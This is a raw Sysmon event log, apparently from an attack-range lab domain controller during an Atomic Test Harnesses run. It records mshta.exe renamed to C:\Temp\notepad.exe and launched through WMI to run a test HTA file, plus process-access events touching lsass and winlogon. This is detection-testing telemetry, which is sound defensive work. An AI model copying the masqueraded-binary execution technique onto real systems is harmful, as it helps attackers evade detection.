16:03:36.546{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029605Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.546{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029604Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.546{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029603Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.546{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029602Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.546{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029601Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.546{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029600Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.546{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029599Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.546{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029711Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:37.905{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-5457-6008-BD06-00000000A301}6332C:\Temp\notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029710Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:37.905{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-5457-6008-BD06-00000000A301}6332C:\Temp\notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029709Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:37.905{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-5457-6008-BD06-00000000A301}6332C:\Temp\notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029778Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.968{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5466-6008-C006-00000000A301}5632C:\Temp\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029777Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.968{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5466-6008-C006-00000000A301}5632C:\Temp\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029776Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.968{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5466-6008-C006-00000000A301}5632C:\Temp\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029775Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.968{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5466-6008-C006-00000000A301}5632C:\Temp\notepad.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029774Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.968{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5466-6008-C006-00000000A301}5632C:\Temp\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029773Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.952{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5466-6008-C006-00000000A301}5632C:\Temp\notepad.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029772Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.952{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5466-6008-C006-00000000A301}5632C:\Temp\notepad.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029771Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.936{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5466-6008-C006-00000000A301}5632C:\Temp\notepad.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029770Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.936{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029769Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.936{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029768Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.936{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029767Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.936{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029766Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.936{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-5466-6008-C006-00000000A301}5632C:\Temp\notepad.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029765Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.936{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5466-6008-C006-00000000A301}5632C:\Temp\notepad.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000029764Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.940{7901BC46-5466-6008-C006-00000000A301}5632C:\Temp\notepad.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Temp\notepad.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-5457-6008-BC06-00000000A301}8012C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000029763Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.921{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029762Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 